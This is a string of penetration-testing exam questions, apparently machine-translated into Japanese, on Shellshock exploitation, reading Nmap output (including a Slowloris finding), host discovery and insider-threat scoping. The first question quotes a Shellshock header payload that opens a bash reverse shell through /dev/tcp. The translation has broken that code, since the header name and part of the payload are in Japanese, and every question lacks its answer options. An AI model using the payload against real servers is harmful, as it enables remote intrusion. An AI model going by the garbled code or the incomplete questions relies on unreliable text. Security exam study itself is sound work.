ペネトレーション テスターが 10.10.1.1 で脆弱な Web サーバーを発見しました。次に、テスターは Web エクスプロイトを送信する Python スクリプトを編集し、次のコードを見つけます。
エクスプロイト = {"ユーザー エージェント": "() { 無視されました;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application /xhtml+xml,application/xml"} サーバーが実行されているユーザー コンテキストを判断するには、テスターがスクリプトに対して次の編集のうちどれを行う必要がありますか?

Nmap スキャンの結果は次のとおりです。
Nmap 7.80 ( https://nmap.org ) を 2021-01-24 01:10 EST に開始します
( 10.2.1.22 ) の Nmap スキャン レポート
ホストは起動しています (遅延 0.0102 秒)。
非表示: 998 のフィルタリングされたポート
ポートステートサービス
80/tcp オープン http
|_http-title: 80F 22% RH 1009.1MB (text/html)
|_http-slowloris-check:
| 脆弱：
| スローロリス DoS 攻撃
| <..>
デバイスタイプ: ブリッジ|汎用
実行中 (推測) : QEMU (95%)
OS CPE: cpe:/a:qemu:qemu
ホストに正確に一致する OS が見つかりません (テスト条件が理想的ではありません)。
OSの検出が実行されました。間違った結果があった場合は、https://nmap.org/submit/ で報告してください。
Nmap 完了: 107.45 秒で 1 つの IP アドレス (1 つのホストが起動) がスキャンされました
次のデバイス タイプのうち、同様の応答が得られる可能性が最も高いのはどれですか? (2つお選びください。)

ペネトレーションテスターは、アクティブなシステムを迅速に特定するためにクラス C ネットワークを検査しています。ペネトレーションテスターは次のコマンドのうちどれを使用する必要がありますか?

セキュリティ エンジニアは、ネットワーク上の新しいサーバーを特定し、そのホストをスキャンして、承認されたバージョンの Linux とパッチ適用されたバージョンの Apache が実行されているかどうかを確認したいと考えています。次のコマンドのうち、このタスクを実行できるのはどれですか?

あるセキュリティ会社は、PII と給与データを保管する人事サーバーへのアクセスを試みるために、範囲を限定した内部関係者の脅威評価を実行する契約を結んでいます。
ａ．ペネトレーション テスターに​​は、内部ネットワークの開始位置が与えられています。
次のアクションが実行された場合、評価の範囲内で倫理的となるのはどれですか?